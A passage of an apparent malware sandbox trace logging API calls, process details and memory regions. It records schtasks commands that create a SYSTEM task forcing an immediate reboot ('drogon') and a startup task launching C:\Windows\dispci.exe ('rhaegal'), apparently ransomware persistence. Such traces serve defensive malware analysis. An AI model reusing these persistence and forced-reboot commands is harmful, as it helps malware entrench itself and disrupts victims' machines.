CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3ff038*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ff084 | out: lpCommandLine="schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00", lpProcessInformation=0x3ff084*(hProcess=0x78, hThread=0x74, dwProcessId=0x9f0, dwThreadId=0x9f4)) returned 1 [0017.973] CloseHandle (hObject=0x74) returned 1 [0017.973] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0017.973] GetEnvironmentStringsW () returned 0x4560e8* [0017.973] FreeEnvironmentStringsW (penv=0x4560e8) returned 1 [0017.973] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0018.886] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3fef78 | out: lpExitCode=0x3fef78*=0x0) returned 1 [0018.886] CloseHandle (hObject=0x78) returned 1 [0018.886] _vsnwprintf (in: _Buffer=0x3ff0c0, _BufferCount=0x13, _Format="%08X", _ArgList=0x3fef84 | out: _Buffer="00000000") returned 8 [0018.886] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0018.886] GetEnvironmentStringsW () returned 0x457f28* [0018.886] FreeEnvironmentStringsW (penv=0x457f28) returned 1 [0018.886] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0018.886] GetEnvironmentStringsW () returned 0x457f28* [0018.886] FreeEnvironmentStringsW (penv=0x457f28) returned 1 [0018.886] DeleteProcThreadAttributeList (in: lpAttributeList=0x3fefdc | out: lpAttributeList=0x3fefdc) [0018.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0018.886] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0018.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0018.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 1 [0018.886] _get_osfhandle (_FileHandle=0) returned 0x3 [0018.886] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 1 [0018.887] SetConsoleInputExeNameW () returned 0x1 [0018.887] GetConsoleOutputCP () returned 0x1b5 [0018.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0018.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0018.887] exit (_Code=0) Process: id = "7" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x61b2f000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x998" cmd_line = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 611 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 612 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 613 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 614 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 615 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 616 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 617 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 618 start_va = 0x450000 end_va = 0x47dfff entry_point = 0x467683 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 619 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 620 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 621 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 622 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 623 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 624 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 625 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 626 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 627 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 628 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 629 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 630 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 631 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 632 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 633 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 634 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 635 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 636 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 637 start_va = 0x74820000 end_va = 0x74828fff entry_point = 0x74821830 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll") Region: id = 638 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 639 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 640 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 641 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 642 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 643 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 644 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 645 start_va = 0x75fe0000 end_va = 0x7606efff entry_point = 0x75fe3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 646 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76089ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 647 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 648 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 649 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 650 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 651 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x7675ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 652 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 653 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 654 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 655 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 656 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 679 start_va = 0x6a0000 end_va = 0x827fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 680 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 681 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 682 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 683 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 684 start_va = 0x170000 end_va = 0x181fff entry_point = 0x170000 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 685 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 686 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 687 start_va = 0x830000 end_va = 0x9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 688 start_va = 0x9c0000 end_va = 0x1dbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 689 start_va = 0x747f0000 end_va = 0x747f8fff entry_point = 0x747f1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 690 start_va = 0x1dc0000 end_va = 0x208efff entry_point = 0x1dc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 723 start_va = 0x74410000 end_va = 0x7448ffff entry_point = 0x744237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 724 start_va = 0x2090000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 727 start_va = 0x310000 end_va = 0x3eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 814 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 815 start_va = 0x20e0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 816 start_va = 0x2220000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 817 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 818 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 819 start_va = 0x761f0000 end_va = 0x76272fff entry_point = 0x761f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 820 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 821 start_va = 0x74660000 end_va = 0x746dcfff entry_point = 0x7466166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 824 start_va = 0x74730000 end_va = 0x7475efff entry_point = 0x74730000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Thread: id = 10 os_tid = 0x9bc [0017.861] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafe6c | out: lpSystemTimeAsFileTime=0xafe6c*(dwLowDateTime=0x43e523b0, dwHighDateTime=0x1d34da4)) [0017.861] GetCurrentProcessId () returned 0x9b8 [0017.861] GetCurrentThreadId () returned 0x9bc [0017.861] GetTickCount () returned 0x1423d [0017.861] RtlQueryPerformanceCounter () returned 0x1 [0017.863] GetModuleHandleA (lpModuleName=0x0) returned 0x450000 [0017.863] __set_app_type (_Type=0x1) [0017.863] __p__fmode () returned 0x76ae31f4 [0017.863] __p__commode () returned 0x76ae31fc [0017.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x467881) returned 0x0 [0017.863] __wgetmainargs (in: _Argc=0x479e6c, _Argv=0x479e74, _Env=0x479e70, _DoWildCard=0, _StartInfo=0x479e80 | out: _Argc=0x479e6c, _Argv=0x479e74, _Env=0x479e70) returned 0 [0017.864] _onexit (_Func=0x470fe2) returned 0x470fe2 [0017.864] _onexit (_Func=0x470ff3) returned 0x470ff3 [0017.864] _onexit (_Func=0x471002) returned 0x471002 [0017.864] _onexit (_Func=0x47101e) returned 0x47101e [0017.864] _onexit (_Func=0x47103a) returned 0x47103a [0017.864] _onexit (_Func=0x471056) returned 0x471056 [0017.864] _onexit (_Func=0x471072) returned 0x471072 [0017.864] _onexit (_Func=0x47108e) returned 0x47108e [0017.864] _onexit (_Func=0x4710aa) returned 0x4710aa [0017.864] _onexit (_Func=0x4710c6) returned 0x4710c6 [0017.864] _onexit (_Func=0x4710e2) returned 0x4710e2 [0017.865] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0017.865] WinSqmIsOptedIn () returned 0x0 [0017.865] SetLastError (dwErrCode=0x0) [0017.865] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0017.865] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0017.865] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0017.865] VerifyVersionInfoW (in: lpVersionInformation=0xaf8e4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xaf8e4) returned 1 [0017.865] lstrlenW (lpString="") returned 0 [0017.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0017.866] SetLastError (dwErrCode=0x0) [0017.866] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b5bf8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0017.866] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x747f0000 [0017.868] GetProcAddress (hModule=0x747f0000, lpProcName="GetFileVersionInfoSizeW") returned 0x747f19d9 [0017.868] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0017.868] GetProcAddress (hModule=0x747f0000, lpProcName="GetFileVersionInfoW") returned 0x747f19f4 [0017.868] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x5b5e08 | out: lpData=0x5b5e08) returned 1 [0017.868] GetProcAddress (hModule=0x747f0000, lpProcName="VerQueryValueW") returned 0x747f1b51 [0017.868] VerQueryValueW (in: pBlock=0x5b5e08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaf9ec, puLen=0xaf9f0 | out: lplpBuffer=0xaf9ec*=0x5b61a4, puLen=0xaf9f0) returned 1 [0017.870] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.870] _vsnwprintf (in: _Buffer=0x5b5bf8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xaf9d4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0017.870] VerQueryValueW (in: pBlock=0x5b5e08, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xaf9fc, puLen=0xaf9f8 | out: lplpBuffer=0xaf9fc*=0x5b5fd0, puLen=0xaf9f8) returned 1 [0017.870] lstrlenW (lpString="schtasks.exe") returned 12 [0017.870] lstrlenW (lpString="schtasks.exe") returned 12 [0017.870] lstrlenW (lpString=".EXE") returned 4 [0017.870] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0017.870] lstrlenW (lpString="schtasks.exe") returned 12 [0017.870] lstrlenW (lpString=".EXE") returned 4 [0017.870] _memicmp (_Buf1=0x5b4db8, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.870] lstrlenW (lpString="schtasks") returned 8 [0017.870] _memicmp (_Buf1=0x5b4e18, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.871] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.871] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0017.871] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0017.871] _vsnwprintf (in: _Buffer=0x5b67e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xaf9d8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0017.871] SetLastError (dwErrCode=0x0) [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="?") returned 1 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="create") returned 6 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="delete") returned 6 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="query") returned 5 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="change") returned 6 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="run") returned 3 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="end") returned 3 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] lstrlenW (lpString="showsid") returned 7 [0017.871] GetThreadLocale () returned 0x409 [0017.871] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0017.871] SetLastError (dwErrCode=0x0) [0017.871] SetLastError (dwErrCode=0x0) [0017.871] lstrlenW (lpString="/Create") returned 7 [0017.871] lstrlenW (lpString="-/") returned 2 [0017.871] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.871] lstrlenW (lpString="?") returned 1 [0017.871] lstrlenW (lpString="?") returned 1 [0017.871] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] lstrlenW (lpString="Create") returned 6 [0017.872] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] _vsnwprintf (in: _Buffer=0x5b4e60, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|?|") returned 3 [0017.872] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|Create|") returned 8 [0017.872] lstrlenW (lpString="|?|") returned 3 [0017.872] lstrlenW (lpString="|Create|") returned 8 [0017.872] SetLastError (dwErrCode=0x490) [0017.872] lstrlenW (lpString="create") returned 6 [0017.872] lstrlenW (lpString="create") returned 6 [0017.872] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] lstrlenW (lpString="Create") returned 6 [0017.872] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|create|") returned 8 [0017.872] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|Create|") returned 8 [0017.872] lstrlenW (lpString="|create|") returned 8 [0017.872] lstrlenW (lpString="|Create|") returned 8 [0017.872] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0017.872] SetLastError (dwErrCode=0x0) [0017.872] SetLastError (dwErrCode=0x0) [0017.872] SetLastError (dwErrCode=0x0) [0017.872] lstrlenW (lpString="/RU") returned 3 [0017.872] lstrlenW (lpString="-/") returned 2 [0017.872] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0017.872] lstrlenW (lpString="?") returned 1 [0017.872] lstrlenW (lpString="?") returned 1 [0017.872] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] lstrlenW (lpString="RU") returned 2 [0017.872] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|?|") returned 3 [0017.872] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.872] lstrlenW (lpString="|?|") returned 3 [0017.872] lstrlenW (lpString="|RU|") returned 4 [0017.872] SetLastError (dwErrCode=0x490) [0017.872] lstrlenW (lpString="create") returned 6 [0017.872] lstrlenW (lpString="create") returned 6 [0017.872] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] lstrlenW (lpString="RU") returned 2 [0017.872] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.872] _vsnwprintf (in: _Buffer=0x5b54b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|create|") returned 8 [0017.872] _vsnwprintf (in: _Buffer=0x5b5490, _BufferCount=0x5, _Format="|%s|", _ArgList=0xaf9c0 | out: _Buffer="|RU|") returned 4 [0017.872] lstrlenW (lpString="|create|") returned 8 [0017.872] lstrlenW (lpString="|RU|") returned 4 [0017.872] StrStrIW (lpFirst="|create|", lpSrch="|RU|") returned 0x0 [0017.872] SetLastError (dwErrCode=0x490) [0017.872] lstrlenW (lpString="delete") returned 6 [0017.872] lstrlenW (lpString="delete") returned 6 [0017.872] _memicmp (_Buf1=0x5b4e48, _Buf2=0x451ed8, _Size=0x7) returned 0 [0017.873] lstrlenW (lpString="RU") returned 2 [0017.873] _memicmp (_Buf1=0x5b4e78, _Buf2=0x451ed8, 